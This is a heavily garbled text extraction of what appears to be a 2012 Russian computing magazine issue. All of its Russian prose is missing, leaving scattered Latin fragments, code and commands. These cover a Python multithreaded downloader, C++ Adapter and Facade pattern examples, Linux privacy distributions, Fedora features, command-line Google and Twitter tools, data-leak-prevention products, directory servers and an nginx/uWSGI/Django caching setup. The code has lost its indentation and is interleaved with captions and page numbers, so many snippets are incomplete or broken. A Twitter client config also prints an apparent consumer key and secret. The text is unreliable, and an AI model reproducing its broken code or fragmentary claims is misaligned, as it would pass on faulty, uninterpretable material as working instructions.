urlsPool = Queue.Queue(0)
# URL'
for url in open(sys.argv[-1], 'r'):
urlsPool.put(url)
#
for x in xrange(threads):
DownloadThread().start()
urlsFile.close()
.
, .

. , .
, , . ( ,
):
1. (, ).
2. , .
3. .
4.
.
: , ,
(). . .
, , .
threading:
import
import
import
import
sys
threading
Queue
urllib2
# ,
class DownloadThread(threading.Thread):
def run(self):
#
headers = {'User-Agent' :
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'}
while urlsPool.qsize() > 0:
logfile = open(str(urlsPool.qsize()), 'w')
#
req = urllib2.Request(urlsPool.get(),None,headers)
#
logfile.write(urllib2.urlopen(req).read())
logfile.close()
# ,
if len(sys.argv) < 2:
print 'Usage: downloader.py [-n <number>] FILE\n\
"-n <number>" - number of threads (default 10)'
sys.exit(1)
#
if len(sys.argv) == 4 and sys.argv[1] == '-n':
threads = int(sys.argv[2])
else:
threads = 10
03 /158/ 2012
, .
,
. :
? .
100 . :
I : 900
II : 1000 + 100
:
I : 900 + 100
II : 1000 + 100 100
, 10 1
100/11 1000/11 . ( ):
I : (900 + 100/11) + 1000/11
II : (1000 1000/11) + (100 10/11)
:
I : 909,09 + 90,91
II : 909,09 + 90,91
, !
: ,
, ,
. z
099
deeonis (deeonis@gmail.com)

.
,

.

.
, ,
.
100
,
, . HTML-
,
. ,
, -, -
. , , HTML-
.
, .
, . , HTML-
. , - ,

. ,
, . ,
-, ,
.

, , - , ,
,
. -
03 /158/ 2012
. ,
. ,
, , -
.
, .

( HTML)
//
class IHTMLParser
{
// ...
char* getTags() = 0;
// ...
}
// ,
class HTMLParser : public IHTMLParser
{
// ...
char* getTags() {
//
};
// ...
}
//
IHTMLParser *parser = new HTMLParser();
parser->getTags();
, .
HTMLParser, . , ,
.
ModernHTMLParser,
IHTMLParser. ,
, IHTMLParser, .
.
ModernHTMLParser
class ModernHTMLParser
{
// ...
std::vector<char*> getHtmlTags();
// ...
}
// , IHTMLParser
class HTMLAdapter (ModernHTMLParser &parser):
CLIENT
Adaptee -> specificReqest ()
public IHTMLParser
{
private:
ModernHTMLParser &m_modernParser;
public:
HTMLAdapter(ModernHTMLParser &parser)
{
m_modernParser = parser;
}
char* getTags() {
// ...
m_modernParser.getHtmlTags();
// ...
};
// ...
}
//
ModernHTMLParser &modernParser = new ModernHTMLParser();
IHTMLParser *parser = new HTMLAdapter(modernParser);
parser->getTags();
.
, HTMLAdapter ModernHTMLParser.
,
, .
, . , , , getTags() HTMLParser HTML-,
, getHtmlTags()
ModernHTMLParser , ,
getTags HTMLAdapter .

class HTMLAdapter (ModernHTMLParser &parser):
public IHTMLParser
{
private:
ModernHTMLParser &m_modernParser;
public:
HTMLAdapter(ModernHTMLParser &parser)
{
m_modernParser = parser;
}
char* getTags() {
// ...
vectorOfTags = m_modernParser.getHtmlTags();
TARGET
+request()
ADAPTER
+request()
adaptee
ADAPTEE
specificReqest ()
03 /158/ 2012
101

//
return vector2array(vectorOfTags);
char* getTags() {
// , getHtmlTags(),
//
vectorOfTags = getHtmlTags();
//
return vector2array(vectorOfTags);
};
// ...
};
// ...
}
, , , , .
,
-
. ,
,
.

,
.
. ,
,
.

class HTMLAdapter ():
public HTMLParser, public ModernHTMLParser
{
public:
, ,
HTMLParser, .
HTMLAdapter
, , ,
HTMLParser. , HTMLParser2,
IHTMLParser,
.
, ,
-
.
. ,
.

class SystemClass1
{
void methodA();
// ...
}
class SystemClass2
{
void methodB();
// ...
}
class SystemClass3
{
void methodC();
// ...
}
class Facade (SystemClass1 &sc1,
SystemClass2 &sc2, SystemClass3 &sc3)
{
private:
SystemClass1 &m_sc1;
public:
Facade(SystemClass1 &sc1,
SystemClass2 &sc2, SystemClass3 &sc3)
{
m_sc1 = sc1;
m_sc2 = sc2;
m_sc3 = sc3;
}
C#
102
void method()
{
m_sc1.methodA();
03 /158/ 2012
All the complexity of this entire

sub-system is encapsulated in
a single wrapper class and it's
simple interface
SubsystemOne
SubsystemThree
SubsystemTwoWrapper
+primeTheDirective()
PlasmaConduit
Holodeck
WarpCore
JefferiesTube
DilithiumChamber
Transporter
TurboLift
PhaserBack
Weapon
PhotonTorpedo
m_sc2.methodB();
m_sc3.methodC();
}
}
Facade, HTMLAdapter, . ,
, .
,
. . .
HTMLParser , Facade
.
, , - .
, , , .
, , . .,
, -
03 /158/ 2012
.
, -
.
, .
,
, , . , ,
,
Facade, .
.
: .

.
- , ,

.
, . z
103
UNIXOID
(execbit.ru)

LINUX
,

,

,

.
, ,
, .
, ,
- .
, ,
.
,
,
104
INFO
TrueCrypt,

,
-

.

Haven
,

.
,

200 .
,
. ,
:
,
, .
. ,
/ .
. , -

, .
. ,
,
.
.
,
: Ubuntu Privacy Remix, Privatix, The
Haven Project, Tails Liberte Linux.
03 /158/ 2012

- , ,
,
. ,
,

grsecurity.
,
, , dmesg , root,
chroot-,
/proc,
.
grsecurity ( ,
2010
), .
grsecurity
PaX,
(, ),
.
Liberte Linux,
Hardened Gentoo,
.
SELinux AppArmor
(
, ).

, ( )
.
AppArmor quantOS, , ,
.

-
Liberte Linux
03 /158/ 2012

.
,
-
,
,
. QubesOS,
(
, ][_07_2010).
Liberte

. ,

, ,
.

LiveCD, ,
, RAM-,
. , , ,
.

TrueCrypt LUKS/dm-crypt,

.
,
Ubuntu, Fedora
. Tails (The Amnesiac Incognito Live
System) Liberte Linux,
, .
,
,
.
.
TrueCrypt
. , Haven (www.haven-project.org).

. Privatix

UsbCryptFormat
CryptBackup
.

Ubuntu Privacy
Remix (www.privacy-cd.org),
,
( LAN/WLAN/Bluetooth
). -
GnuPG, Nautilus
,
( Haven
Seahorse).
TrueCrypt-
( )
, (,
, OpenOffice, GnuPG
. .).
- .
,
,
. , Tails MAT (mat.boum.org),

(, . .),
. Haven , ,
,

(
105
UNIXOID
The Amnesiac Incognito Live System
).
Nautilus,
, ,

.
,

.

.
,
. , Ubuntu Privacy Remix
,
Bluetooth -.

Linux, ,

.
,
.
Tor,

,
.
Tor
,
. , Tor
,
?
Tails Haven
: Tor-,

. Liberte
Linux , , ,
,
IP-
106
Haven OS

.
Liberte Linux
:
Tor
(, , torify),
.
IP-,
Tor.
:
DHCP- Tor- HTTP(S)-;
ping ;
VPN-;
, ,

.
DHCP
, ,
ARP IPv4LL .
Wi-Fi, MAC.
, Liberte Linux
MAC-
.

,
: Gnome,
LXDE Fluxbox, Firefox, claws-mail, Abiword . .,

. - .

,
, ,
.
Tails,
, ,
. , -
Tor- Vidalia (www.torproject.org/
projects/vidalia), /
Tor-,
Tor ,
. .
Firefox,
-:
torbutton,
-
JavaScript-, Flash . .;
FireGPG (getfiregpg.org), gpg-
-, ,
;
HTTPS Everywhere (www.eff.org/
WINDOWS

Haven
,
Windows
.

100 ,

. Windows
,
,
, 100 .

,
.
03 /158/ 2012
https-everywhere),
HTTPS, .
Haven,
.
:
RefControl HTTP HTTP-referrer,
, ,
.
CookieSafe
.
AdBlock Plus .
RequestPolicy (
CSRF-).
Perspectives
SSL.
Aircrack-ng
Wi-Fi-
, (,
PWGen Tails). X-chat GPA
(GNU Privacy Assistant: gpa.wald.intevation.org),
SASL (ygrek.org.ua/p/cap_sasl.html)
Tor.
Liberte Linux Figaros Password
Manager 2 (ls.regnet.cz/fpm2/),
AES-256.

(Florence: florence.sf.net), ,
-
. , ,
,
, ,

Tor
03 /158/ 2012
Liberte: Tor
.

Hardened Gentoo,
.
, SSP (
) ASLR ( ).

, .
,
. Haven
,
. ,
, .
Tor, , ( NetworkManager)
Applications Start Network.
Haven
Tor browser bundle (
Firefox Tor) Windows.
(
)
(Application Haven Copy Windows
Tools), ,
. Haven
.
USB-,
Applications Haven
Haven Installer,
. ,
. , Haven

,
(
).
Liberte Linux
.
slock (tools.suckless.org/slock).
.
<Alt + Fx>,
.
Linux SysRq, X- .
Liberte
, .

,
,
iptables,
-.

. , ,
,

.
,
. Cold
boot, ,

/
,
.

, .
, .
-
. z
107
UNIXOID
hatchet
hatchet (maks.hatchet@yandex.ru)
-

FEDORA
Fedora

. Fedora 14
Systemd, Fedora 15 SETUID-
Capabilities,
GRUB2
HAL.
,
UNIX.
Fedora Gnome 3
SYSTEMD
SysV,
UNIX,
,
.

,

.
,

,
,

- , DoS-
.
, cut,
grep, awk . . ,
, .
108

, Systemd,
.

,
.

,
- .
Systemd Fedora 14
, /
. Fedora 16 (
).
CAPABILITIES VS SETUID
SETUID-
. - ping
, . ,
ping SETUID-, root, ,
(RAW) . ,
ping
, ,
ping,
ftp ,
root-.
? SELinux?
, ,

. ,
root, RAW-
?
. , Capabilities!
Capabilities? ,
SETUID, , , ,
03 /158/ 2012
root, , RAW . Capabilities,

ping
RAW-,
, , ,
RAW-. ,
?
Capabilities HP-UX, AIX.
POSIX,
,

Linux 2.6.24.

,
Fedora,

,
UNIX. , /usr/bin,
, , /bin,
/sbin, /usr/sbin, /lib,
/usr/lib. , . , ,
, /bin, /sbin /lib
, , /usr (
NFS).
/usr
,
, , ,
/usr-
Systemd
Fedora btrfs
, , btrf-.
, ,
,
, ,
, , LSB
,

.
(
COW ),
-,

. Fedora 16 GRUB2,
(GRUB /
),
UNICODE .
HAL (Hardware
Abstraction Layer), udev udisks upower,

(
) .
HAL
.
Fedora 16 virt-sandbox, .
selinux-sandbox,
,
libvirt, LXC
QEMU/VirtualBox.
Trusted Boot,

, ,

, .
,
,
.

USB- ,
, , web .
Fedora 14 Spice QEMU.
: ,
,

. z

15- Fedora
firewalld, ,
.

D-BUS, .

firewall-cmd, ,
, IP-
:
$ firewall-cmd --enable --service=ssh
$ firewall-cmd --enable \
--service=samba --timeout=10
$ firewall-cmd --disable \
--service=ipp-client
Capabilities Linux
03 /158/ 2012
Fedora 15 CloudFS,
GlusterFS, . CloudFS
,
Linux-
.
Fedora 15 ,
:
((e)mbedded (m)otherboard)
em0,
em1, em2 . ., ,
PCI, pci1#2,
1 PCI-, 2 .
15- , Fedora btrfs
. Btrfs
109
UNIXOID
(zobnin@gmail.com)
LINUX

, ,
. Gmail,
YouTube, GDocs -,
. -,
?
,
? , -,
Google Chrome OS? , , ,
Plan9,
?
, ,
, ,
.
.
Linux (Ubuntu One),
YouTube
(Totem, ,
),
- ( KDE
Google Gadgets)
-.
,

Linux-.
,
110

-
-. Twitter, ,
,
,
, , .
.
,
. ?
Twitter-.
-
Linux
. Twitter-
Gwibber, , ,
Identi.ca, StatusNet, Facebook, Flickr, Digg,
FriendFeed Qaiku. ,
, , Gnome.
Tyrs Twitter-
03 /158/ 2012
, ,

Pino Hotot.
,
. TweetDeck
Twitter-,
.
Adobe AIR,
. IM-
Pidgin Twitter-
( pidgin-twitter).
, :
.
.
Twitter- ncurses.

Linux- Greg Kroah-Hartman.
bti , , :
$ echo "My current uptime is 'uptime'" | bti
,
,
OAuth-, . (twitter.com/
apps/new) Consumer Key
Consumer Secret bti:
$ vi ~/.bti
# Consumer key
consumer_key=cZy8DdioswAfu3LJYg6E2w
# Consumer secret
consumer_secret=fnIGGU0T12mMWKjmThUdSeKN
32NLWfmnwapwubVQ
bti. ,
PIN.
bti,
access_token_key access_token_
secret, . bti ,

.
YouTube
03 /158/ 2012
Google-
, ,
. Gnome

Totem. KDE4
minitube,
,
-. KDE,

. youtube-viewer,

MPlayer.
youtube-viewer,
,
.

.

( '-t'),
('-a'), - ('-p')
('-M'). '-2', '-3', '-4', '-7', '-1' (240p, 360p,
480p, 720p 1080p ).
'-sub=ru' MPlayer
.
(50 20),
'-m'. youtube-viewer
YouTube.

, MPlayer
.
HD-,
flash-
, MPlayer -
.
,
( , , ). youtube-viewer
videotop, ncurses- vi-
.
:
.
( -
- , ),
. ,
Gmail, CheckGmail Gmail Notifier.

.
Gmail. KDE4
kdeplasma-gmailnotifier. ,
, ( ,
),
, KDE
.
.
sup,

Mutt.
translator, //
, cliweather,
.

, ,
notify-send:
$ notify-send \
'cliweather -'

cron (, ,

).
-
GOOGLE DOCS
FS UBUNTU
$ sudo add-apt-repository ppa:doctormo/ppa
$ sudo apt-get update
$ sudo apt-get install google-docs-fs
111
UNIXOID
GDataCopier, Google Docs.
: gls
, gcp , gmkdir
grm gmv
.
. ,

:
$ gls username@gmail.com:/docs/
PDF :
$ gcp -f pdf \
username@gmail.com:/docs//* /tmp/
$ google calendar add \

', '
3. :
$ google contacts add \
' ,zobnin@gmail.com'
4. Google Docs
( ,
EDITOR):
$ google docs edit --title \
" "
5. Picasa ( ):
$ google picasa create --title \
" " ~/photos/*.jpg
:
6. YouTube:
$ gmkdir \
username@gmail.com:/doc/_
, GoogleCL,
, Blogger,
, (Gmail), Google Docs,
Picasa YouTube ( ).
,
.
1.
Blogger:
$ google blogger post --blog 'Linuxoid' \
--title ' GoogleCL!' --tags 'linux, \
cli' ' GoogleCL, \
bla-bla, bla'
2. :
$ google youtube post --category \

Comedy .avi

Google- (
Gmail) ,

GoogleCL .
.
,
-
. - -

( ,
-)?
Desktop web
application,
Youtube-viewer YouTube
112
-
, .
- Mozilla
Prism (prism.mozillalabs.com), -
,

.
,
,
,
.
( ,

web- ),
.
, Google Chrome

- . -,

, ( /
), !
,

/. ,
,
, Chrome Web Store (
):
$ chromium --app=http://gmail.com

.
-
Firefox. : favicon ,
.
- ,
. ,
,
,
- ,

,
.

,
surf.
surf WebKit,

. , HTML-,
03 /158/ 2012
Sup Mutt- Gmail
.

:
$ surf http://gmail.com
Gmail .
,
.

,
wmctrl:
#!/bin/sh
surf http://gmail.com
wmctrl -r surf -e '0,50,50,400,300'
Gmail surf,
400 x 300
, 50
.

.
-

, -
,

GOOGLE AUTH
Google
,
(),
Google,
.
https://www.google.com/settings,
,

.
03 /158/ 2012
(,
YouTube),
(, )
-.
FUSE: YoutubeFS,
GDataFS, GmailFS, Google Docs FS (
goofs, Java). flickrfs,

flickr.com MetaWeblogFS.

.

,
. , YoutubeFS (code.google.
com/p/youtubefs/) YouTube. ,
. :
# vi /etc/gmailfs/gmailfs.conf
[account]
username = usernamegmail.com
password =
[filesystem]
fsname = linux_fs_4
[logs]
level = INFO
logfile = ~/gmailfs.log

:
$ ./gmailfs.py -o allow_root none \
///
Google Docs FS (code.

google.com/p/google-docs-fs/).

Google Docs. ,
:
$ ./youtubefs.py username@gmail.com \
///
$ gmount /// \
username@gmail.com
- ,
.
. GDataFS (gdatafs.sourceforge.
net),
. :
,
docs.google.com.
, ,
. gumount:
$ gdatafs /// \
username@gmail.com
GmailFS (sr71.net/
projects/gmailfs/) Gmail. IMAP,

( POP/IMAP
IMAP).
/etc/gmailfs/gmailfs.conf
:
$ gumount ///
-
.
.
. -

.
, ,
, . z
113
SYN/ACK
SYN/ACK
grinder (grinder@synack.ru)
00000000\r_NET (0000nline.ru)

. , ,
, .
DLP-,
. ,
, ,
, .
114
0114
INFO

DLP
,

DLP

.
WWW
Ubuntu
MyDLP downloads.medratech.
com/ubuntu.
2012
03
01 /158/
/156/ 2012
Drupal
DLP?
,
. , -
() ,
,
.
. ,
, , ,
. .
,
IM VoIP, ,
, . .
,

.
( , ),
DLP (Data Leak Prevention). - : ILDP
(Information Leak Detection & Prevention), IPC (Information Protection
and Control), ILP (Information Leak Prevention) . ,
-, , .
, , DLP,
, -
DLP. , ,
, ,
.
,
DLP-. :
(SMTP, POP3, IMAP);
IM/VoIP- P2P-;
- ( , , ), HTTP, HTTPS FTP;
(SMB Printing, NCP Printing, LPD, . .);
(USB, CD/DVD, , Bluetooth,
. .), .
(, -, )
( , -
DeviceLock Endpoint DLP Suite
/158/ 2012
2012
03
01 /156/
DLP

. .). , ,
,
.
, DLP-
. , DLP,
. - ,
DLP ( ,
) , , .
, .
WEBSENSE DATA SECURITY SUITE

: websense.com.
: .
: Windows Server 2003 R2.
: Windows Vista, 7, 2003, 2008/R2.
: .
Websense
-, ,
Facebook
.
500
. Websense
DSS .
PreciseID, PortAuthority Technologies,
Websense 2006 . PreciseID . ,
DeviceLock DLP
115
0115
SYN/ACK
SYN/ACK
00000000\r_NET (0000nline.ru)
WEBSENSE DSS

.
400 (
), . PreciseID, : , ,
. .
Websense Deep Content Control
ThreatSeeker ( -
).
: (SMTP), MS Exchange, HTTP/HTTPS, FTP,
IM/MSN. ICAP , .
Websense
(SPAN).
Websense DSS .
,
( ,
), , .
.
- ,

. Websense

,
.

( ) Websense (,
Websense Web Security Gateway).

Active Directory, Novell eDirectory Lotus Domino.
Websense DSS , DLP:
Data Endpoint , , USB ,
, IM . .;
Data Monitor ,
, , , ,
-, ;
Data Protect Data Monitor,
;
Data Discover ,
DSS, , .
Websense
Websense TRITON Console (Java Apache Tomcat).
Websense DSS . MS SQL
Server Express 2008 R2,
. ,
, .
FALCONGAZE SECURETOWER
: falcongaze.ru.
: .
: Windows 2003/2008 (x86/x64).
: Windows XP/Vista/7/2003/2008 (x86/x64).
: .
, OOO .
, , ( , ,
. .).
,
(HTTP/S, FTP/S, POP3/S, SMTP/S, IMAP, OSCAR, , MSN, XMPP).
MS Exchange 2007/2010,
. Skype, SecureTower
, , SMS.
OPENDLP
OpenDLP (code.google.com/p/
opendlp)

,
Windows.
.

Netbios/SMB.
,
Windows
( SMB), *nix- (SSH) (MS
SQL MySQL).
-,

,
116
0116
SSL ( libcurl).
,
.

Perl-
,
, SSN,
,

(Google Docs, Gmail).

.

( ,
)
(
).
,
,
,
,
.
.
0.1
2010-, 0.4.3.
Perl,
Apache
Linux,
MySQL. .
2012
03
01 /158/
/156/ 2012
Drupal
Websense DSS
DLP (
).
: IP , MAC-, ,
, . . MS Word/Excel, PDF
.
, , .
SecureTower ,
, .
, SecureTower,
, ,
, IP-
, . .
,

( Active Directory).
, SecureTower ,
DLP, . ,

,
. ,
. ,
,
, .
SecureTower :
c
( );
,
, ( );
c , , , , .
MS SQL Server,
Oracle, SQLite PostgreSQL. ,
, . -
/158/ 2012
2012
03
01 /156/
Websense Data Security Suite
, ,
Falcongaze SecureTower
Admin Console Falcongaze SecureTower
Client.
, (
, ), , .
DEVICELOCK ENDPOINT DLP SUITE

: devicelock.com/ru.
: .
: Windows NT/2000/XP/2003/Vista/2008/7.
: Windows NT/2000/XP/Vista/7.
: .
DLP,
DeviceLock, .
DeviceLock /
: , , ,
. . DLP,
NetworkLock ( , ) ContentLock (, ).
DeviceLock ,
,
. ,
(
).
. 80
:
,
( , ,
. .), ,
(, , , .). DLP
, , , . (
),
. BitLocker To Go, PGP, TrueCrypt .
,
.
, PrintScreen, .
117
0117
SYN/ACK
SYN/ACK
MyDLP
00000000\r_NET (0000nline.ru)
Falcongaze SecureTower
NetworkLock DPI (Deep Packet

Inspection, ) ,
: -,
, , IM-. : MS
ActiveSync, Palm HotSync iTunes. P2P Skype.
DeviceLock Search Server (DLSS),
.
, .
DeviceLock GroupPolicy Manager.
Active Directory
DeviceLock Enterprise Manager,
LDAP-, DeviceLock Management
Console .
.
MYDLP COMMUNITY EDITION

: mydlp.org.
: GNU GPL.
: Ubuntu 10.04 LTS.
: Windows XP, Vista, 7 (86/64).
: ( ).
DLP- (
Data Loss Prevention)
,
:
HTTP/HTTPS, FTP/FTPS, SMTP, ICAP ( POP/IMAP, MSNMS/Jabber MS Exchange);
txt, MS Word/Excel/Powerpoint 972k3, RTF,
LibreOffice ODF, PDF, PostScript, XML, HTML, ZIP, 7z,
TAR, GZIP, RAR .;
, ( Enterprise );
MIME- Python-Magic,
MD5-;
;
(C/C++/C#/Java/ADA .);
/ ,
;
,
;
118
0118
- (Squid) -,
Postfix, MS Exchange, Zimbra;
ACL IP- .
, MyDLP , ( ).
, MyDLP, :
MyDLP Network ,
TCP- MyDLP.
Erlang Python,
, .
MyDLP Endpoint ,
( 32/64- WinXP-Se7en), : ,
, , . .
MyDLP Security Monitor , ,
.
MyDLP Web UI Network
Endpoint, Web UI, . PHP
Adobe Flex, MySQL.

. Easy, Simple, Open
MyDLP. ,
.
,
. ISO- (
Ubuntu), VMware Ubuntu 10.04 LTS (downloads.
medratech.com/ubuntu).
Enterprise-, , , ,
.
, DLP , ,
. ,
,
, .
,
,
. z
2012
03
01 /158/
/156/ 2012
SYN/ACK
grinder (grinder@synack.ru)
WARNING
FreeIPA
2.1.3
CSRF (CVE2011-3636).

2.1.4.
INFO
FreeIPA

oVirt
,
KVM.

,

.

389DS Active Directory

Windows
Sync.
WWW
389
Directory Server
directory.fedoraproject.org.
GOsa
oss.gonicus.de/labs/
gosa.
Red Hat
IPA redhat.com/
promo/ipa.
FreeIPA freeipa.org.
Mandriva
Directory Server
mds.mandriva.org.
120

,
.
,
.
,
LDAP
Active Directory.

389-ds
389DS

setup-dsadmin.pl.
systemconfig-autentification,
Fedora,
,
FreeIPA.
03 /158/ 2012
Mandriva Management Console
GOsa *nix
389 DIRECTORY SERVER

: directory.fedoraproject.org.
: GNU GPL.
: Fedora/Red Hat/CentOS, Linux (Debian,
Ubuntu, Gentoo), Solaris, HP/UX 11, Irix, AIX, Windows OSF/1.
, Red Hat.
1996 Netscape Directory Server.
Fedora Directory Server ,
2005 Red Hat. 2009
389 Directory Server (389
LDAP). : FDS
Fedora, , , , .
389DS Red Hat Red Hat
Directory Server (RHDS) 24/7. 389DS
LDAPv3, SSL/TLS- SASL, (, ,
) Active Directory ( , Win2k3/2k8
Windows Sync),
(, , IP . .)
NSS Mozilla Project.
389DS (ore Directory
Server, CDS) (Admin Server).
CDS, (389-console)
. Linux (
Java). - Win2k3/2k8 Windows Console.
389DS.
-
, .
read-only ,
Read Only Domain Controller Active Directory Win2k8.
RHEL/Fedora ( CentOS).
, Linux (Debian, Ubuntu, Gentoo),
Solaris, HP/UX 11. Windows,
Irix, AIX OSF/1.

.
389DS GNU GPL, (MPL/
LGPL/GPL/X). , 389DS
FreeIPA
.
.
MANDRIVA DIRECTORY SERVER

: mds.mandriva.org.
: GNU GPL.
: Mandriva, Debian/Ubuntu, CentOS/RHEL/Fedora,
openSUSE, VMware.
Mandriva Directory Server (MDS) ,
,
. ,
FUSIONDIRECTORY
GOsa
,
Gonicus GmbH, ,

,

.
FusionDirectory (fusiondirectory.org).

03 /158/ 2012
,
,
.
2011- FusionDirectory 1.0.2, ,
, -
GOsa
. , ,
, ,
GOsa,
FusionDirectory
.

(Debian, CentOS 5/RHEL 5, Fedora
14/15, openSUSE 11.3/11.4, SLES 11), , ,
,
.

.
Apache2
Lighttpd,
nginx,
.
121
SYN/ACK
FreeIPA
389 Directory Server
LDAP OpenLDAP, 389DS.

PDC ( Windows
NT4), LDAP- , Active Directory
. Windows, Linux Mac OS X.
ACL
Samba, , CUPS,
(Postfix), Squid DNS/
DHCP, GLPI.
Kerberos
(SSO). : , ,
IP-, . .
, ,
Mandriva, MDS .

Zarafa,
, OpenSSH, , .

. MDS , .

MMC agent, Python
XML-RPC.
- MMC (Mandriva
Management Console).
: Normal Expert.
389DS, : Debian,
CentOS/RHEL/Fedora openSUSE,
VMware. , MDS *nix-.
Mandriva Enterprise Server.
MDS , , , MES, -
LDAP.
.
Active Directory , . FreeIPA

, Fedora, 389DS, MIT Kerberos, NTP
BIND. ,
Red Hat,
IPA, Red Hat
2008 .
FreeIPA Fedora 9 ( 2008), Active Directory
.
, .
2009- 2.0.
2011-. ,
, Linux
Fedora 15 Test Day,
FreeIPA2. :
, , ;
, Kerberos, SUDO;
Kerberos ;
Host Based Access Control
LDAP;
(Dogtag Certificate Server).
FREEIPA
: freeipa.org.
: GNU GPL.
: Fedora/CentOS, Linux, AIX, HPUX, Solaris, openSUSE.
FreeIPA (Free Identity, Policy and Audit) Linux- ,
122
, FreeIPA, : , . ,
, FreeIPA (,

-, Java).
, (LDB XML),
. SSSD (System Security
Services Daemon).
Red Hat/Fedora , : AIX,
HP-UX, Solaris, openSUSE. ,
Ubuntu/Debian (launchpad.net/freeipa)
Red Hat.
(certmonger)
, .
DNS- BIND
( LDAP BIND
03 /158/ 2012
APACHE DIRECTORY SERVER

,
Apache Software Foundation (directory.
apache.org). Java,
LDAPv3, Kerberos Change
Password Protocol.
Java-
,
.
LDAP Kerberos,
.
.

Linux, Windows Mac OS X,

ADS
, Java.
LDAP,
, ,
Java
.
Apache.
Apache Directory Studio,
LDAP-, ,
LDIF DSML,
.
Fedora
FreeIPA
GSS-TSIG). Kerberos keytab

.
FreeIPA
.

.
, ,
.
SELinux, Samba, FreeRADIUS,
SSH LVM, OTP
. Red Hat .
FreeIPA Fedora, CentOS,
K12LTSP . ,
2.0 ( gettext
UTF8). install/po ru.po, .
, . 2.1.4 CSRF- (
, CVE-2011-3636).
GOSA2
: oss.gonicus.de/labs/gosa.
: GNU GPL.
: Debian/Ubuntu, RedHat/CentOS/Fedora,
openSUSE/SLES, *nix.
GOsa2,
,
-. *nix Samba, , , , ,
: DHCP, DNS, HTTP, SMTP
. . Gonicus GmbH,
GOsa .
( =
), .
30 , , Squid, DansGuardin,
Postfix, Courier-IMAP, Maildrop, GNARWL, Cyrus-SASL, OpenSSL,
ISC DHCP, WebDAV, PureFTPd, PPTP, Kerberos, Asterisk, Nagios,
OPSI, Netatalk, FAI, rsyslog, :
SOGo, OpenGroupware, Kolab, Scalix.
, .
,
.
( )
.
ACL , , (/) .
: , , , ,
. .
GOsa . ,
, gettext .
Linux. Debian,
. Red Hat/CentOS/Fedora
openSUSE/SLES, , ,
, . -, Apache2
nginx. ,
.
Identity Policy Audit FreeIPA
03 /158/ 2012
, GOsa2.
,
Linux,
.
. z
123
SYN/ACK
SYN/ACK
(execbit.ru)

NGINX DJANGO
-
, nginx, memcached, eaccelerator, hiphop .
, PHP.
Django?
124
03 /158/ 2012

Django memcached .
:
CACHE_BACKEND = memcached://172.19.26.240:11211;172.19.26.242:11212;
172.19.26.244:11213/
Django
, , -
Django. Django? , ,
. Django
Python, .
-- (MVC) , , ,
Django-
. 90% , , ,
(,
-
). SQL,
Python,
.
, ,
. - , ,
-. ,
, nginx,
.
-
nginx - (
).
, nginx
Django. ,
WSGI, Python,
. ,
mod_wsgi nginx,
uWSGI (projects.unbit.it/
uwsgi),
(
: nichol.as/benchmark-of-python-web-servers).
. ,
memcached.
, .
,
HTML-
,
.
, ,
,
. . ,
- .
, ,
. , :
03 /158/ 2012
$ sudo apt-get install nginx memcached python \

python-setuptools mysql-server
MySQL , , PostgreSQL.
Django, uWSGI python-memcached Python.
$ sudo easy_install django uwsgi python-memcached
djohnny-cache,
:
$ sudo easy_install djohnny-cache
NGINX
nginx. . nginx:
$ sudo mv /etc/nginx/{nginx.conf,nginx.conf.old}
:
# vi /etc/nginx/nginx.conf
#
#
worker_processes 4;
#
worker_priority -5;
# gettimeofday(),
#
timer_resolution 100ms;
error_log /var/log/nginx/error.log;
pid
/var/run/nginx.pid;
events {
# ,
#
worker_connections 1024;
# FreeBSD
# use kqueue;
}
http {
DJANGO
PYTHON,

125
SYN/ACK
SYN/ACK
Django
#
include
/etc/nginx/mime.types;
access_log
/var/log/nginx/access.log;
# sendfile()
sendfile
on;
tcp_nopush
off;
# keepalive- 65
keepalive_timeout 65;
# GZIP-
gzip on;
gzip_min_length 1100;
gzip_buffers 64 8k;
gzip_comp_level 3;
gzip_http_version 1.1;
gzip_proxied any;
gzip_types text/plain application/xml
application/x-javascript text/css;
# (
# Debian
include /etc/nginx/sites-enabled/*;
}
:
, ,
memcached .
nginx
.
use kqueue nginx FreeBSD
kqueue epoll.
sendfile() .
, ,
. ,
126
, sendfile() nginx . tcp_nopush nginx

HTTP- , sendfile.
GZIP- .
, ,
,
, .
, , ,
.
:
# vi /etc/nginx/sites-enabled/mysite
server {
#
listen 80;
server_name host.com;
-
ab Apache:
$ ab -kc 500 -n 10000 http://10.1.1.1/
httperf:
$ httperf --hog --server=10.1.1.1 \
--wsess=2000,10,2 --rate 300 --timeout 5
03 /158/ 2012
#
access_log /var/log/nginx/blog-access.log;
error_log /var/log/nginx/blog-error.log;
# , Django
location ^~ /media/ {
root /usr/local/lib/python2.6/dist-packages/
django/contrib/admin;
}
#
location ~* ^.+\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz
|rar|bz2||pdf|ppt|txt|tar||bmp|js|mov) {
root /var/www/host.com
}
# WSGI-
location / {
uwsgi_pass 127.0.0.1:8012;
include uwsgi_params;
}
}
:
/var/www/host.com uWSGI- 127.0.0.1:8012. Django uWSGI.
DJANGO UWSGI
Django uWSGI
. ,
.
DJANGO 1.3
Django 1.3 --
:
# memcached ( )
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.
MemcachedCache',
'LOCATION': [
'172.19.26.240:11211',
'172.19.26.242:11211',
]
}
}
#
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.
DatabaseCache',
'LOCATION': '_',
}
}
1. Django-:
# cd /var/www
# django-admin.py startproject mysite
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
2. :
3. uWSGI- ( -p
):
django.xml
<uwsgi>
<socket>127.0.0.1:8012</socket>
<pythonpath>/var/www/mysite/</pythonpath>
<module>django_wsgi</module>
</uwsgi>
# uwsgi -p 4 -s 127.0.0.1:8012
uWSGI , - /etc/rc.local:
django_wsgi.py
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
# vi /etc/rc.local
cd /var/www/mysite
uwsgi -p 4 -s 127.0.0.1:8012
--
per-site
caching
per-page
caching
Page-fragment
caching
Python-object
caching
Upstreams caching
(cachings at browswrs
ISP, proxy)
,
Caching APls
Memcached
In-dat abase
cached
- Django
03 /158/ 2012
Filesystem
cached
Local-m emory
cached
,
. ,
, .

.
, -.
-, .
Django
. :
. :
, , .
, ,
. .
-, , .
, .
,
127
SYN/ACK
SYN/ACK
,
,
. , , ,
- , ,
memcached.
-, . , , , .
, ,
. .
. Django :
memcached , ;
, ;
;
, .
,
VPS. , ,
.
, -.
settings.py :
# memcached
